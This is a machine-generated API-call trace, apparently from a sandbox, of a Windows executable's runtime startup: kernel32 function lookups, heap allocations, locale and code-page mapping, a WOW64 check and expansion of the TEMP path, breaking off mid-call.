0x5b0000 [0242.981] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0242.981] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0242.981] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0242.981] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0242.981] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0242.982] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0242.982] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0242.982] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0242.982] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0242.983] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0242.983] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0242.983] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0242.983] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0242.984] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0242.984] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0242.985] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0242.985] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0242.985] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0242.985] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0242.985] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0242.986] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0242.986] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0242.987] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0242.987] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0242.987] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0242.987] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0242.988] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0242.988] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0242.988] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0242.989] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0242.989] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0242.989] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0242.989] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0242.990] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0242.991] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3bc) returned 0x5c60c0 [0242.991] GetCurrentThreadId () returned 0x614 [0242.992] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x18) returned 0x5c6488 [0242.992] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x800) returned 0x5c64a8 [0242.992] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"Shorthand.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x32c34ff9, hStdError=0x0)) [0242.992] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0242.992] GetFileType (hFile=0x3) returned 0x2 [0242.993] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0242.993] GetFileType (hFile=0x80) returned 0x3 [0242.993] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0242.993] GetFileType (hFile=0xb) returned 0x2 [0242.994] GetCommandLineW () returned="tdq963ii.exe -accepteula \"Shorthand.jtp\" -nobanner" [0242.994] GetEnvironmentStringsW () returned 0x5c6cb0* [0242.994] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb82) returned 0x5c7840 [0242.995] FreeEnvironmentStringsW (penv=0x5c6cb0) returned 1 [0242.995] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0242.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x76) returned 0x5bf8e0 [0242.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa0) returned 0x5c6cb0 [0242.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3e) returned 0x5c83e8 [0242.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6c) returned 0x5c6d58 [0242.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6e) returned 0x5c6dd0 [0242.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x78) returned 0x5bf960 [0242.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x62) returned 0x5c6e48 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c6eb8 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x48) returned 0x5c6ef0 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x26) returned 0x5c6f40 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x28) returned 0x5c6f70 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1a) returned 0x5c5a90 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4a) returned 0x5c6fa0 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x72) returned 0x5bf9e0 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c6ff8 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c7030 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1c) returned 0x5c5ab8 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd2) returned 0x5c7068 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7c) returned 0x5c7148 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x36) returned 0x5c71d0 [0242.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3a) returned 0x5c8430 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x90) returned 0x5c7210 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5c72a8 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c72d8 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x36) returned 0x5c7310 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x48) returned 0x5c7350 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5c73a0 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c) returned 0x5c8478 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x18) returned 0x5c7400 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x82) returned 0x5c7420 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c74b0 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1e) returned 0x5c5ae0 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2c) returned 0x5c74e8 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x54) returned 0x5c7520 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5c7580 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2a) returned 0x5c75e0 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c) returned 0x5c84c0 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x54) returned 0x5c7618 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5c7678 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c76a8 [0242.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8c) returned 0x5c76e0 [0242.997] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7840 | out: hHeap=0x5b0000) returned 1 [0242.998] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x800) returned 0x5c93d0 [0242.998] GetLastError () returned 0x0 [0242.998] SetLastError (dwErrCode=0x0) [0242.999] GetLastError () returned 0x0 [0242.999] SetLastError (dwErrCode=0x0) [0242.999] GetLastError () returned 0x0 [0243.171] SetLastError (dwErrCode=0x0) [0243.171] GetACP () returned 0x4e4 [0243.171] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x220) returned 0x5c9bd8 [0243.171] GetLastError () returned 0x0 [0243.171] SetLastError (dwErrCode=0x0) [0243.171] IsValidCodePage (CodePage=0x4e4) returned 1 [0243.171] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0243.171] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0243.171] GetLastError () returned 0x0 [0243.171] SetLastError (dwErrCode=0x0) [0243.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0243.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0243.171] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0243.171] GetLastError () returned 0x0 [0243.171] SetLastError (dwErrCode=0x0) [0243.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0243.171] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0243.171] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0243.171] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0243.172] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿiNÃ2äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0243.172] GetLastError () returned 0x0 [0243.172] SetLastError (dwErrCode=0x0) [0243.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0243.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0243.172] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0243.172] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0243.172] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿiNÃ2äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0243.172] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x80) returned 0x5c9e00 [0243.172] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0243.172] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0243.172] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5c9e00) returned 0x80 [0243.173] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0243.173] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0243.173] GetCurrentProcess () returned 0xffffffff [0243.173] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0243.173] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0243.174] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0243.174] FindResourceW (hModule=0x0, 